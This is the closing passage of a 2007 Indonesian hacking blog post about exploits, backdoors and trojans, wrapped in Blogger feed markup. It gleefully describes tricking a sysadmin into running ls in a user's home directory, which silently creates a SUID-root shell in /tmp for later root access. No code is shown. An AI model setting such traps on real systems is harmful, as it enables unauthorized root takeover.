class="MsoNormal"&gt;Phardera&lt;/p&gt;  &lt;p class="MsoNormal"&gt;.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Saat menerima imel ini, sang Syadmin pun akan segera memeriksa isi homedir user1 (dengan perintah ls,&lt;/p&gt;  &lt;p class="MsoNormal"&gt;tentunya), dan tanpa disadari sang sysadmin telah menciptakan sebuah shell root di /tmp/vi-save-902887.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Dan, karena vi-save-902887 ber-SUID root, kamu bisa melakukan bermacam-macam hal menyenangkan dengannya.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Tinggal login sebagai user2 beberapa waktu kemudian, dan nikmati ketenangan pikiran lewat shell root!&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Heheheh.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Penutup&lt;/p&gt;  &lt;p class="MsoNormal"&gt;=======&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Begitu dulu, deh, penjelasan dari kami. Semoga ada gunannya untuk kalian semua. Nggak lupa iseng-iseng&lt;/p&gt;  &lt;p class="MsoNormal"&gt;nereakin seluruh kru IndoHack, hackerindo, underground, dan kecoak elektronik!&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9215477832089477726-5889650044023952199?l=nazar-justarroundtheworld.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nazar-justarroundtheworld.blogspot.com/feeds/5889650044023952199/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=9215477832089477726&amp;postID=5889650044023952199' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/9215477832089477726/posts/default/5889650044023952199'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/9215477832089477726/posts/default/5889650044023952199'/><link rel='alternate' type='text/html' href='http://nazar-justarroundtheworld.blogspot.com/2007/10/eksploit-trapdoor-backdoor-dan-trojan.html' title='Eksploit, Trapdoor, Backdoor, dan Trojan Horse'/><author><name>Nazar_Hidayat</name><uri>http://www.blogger.com/profile/14521167102264738808</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>
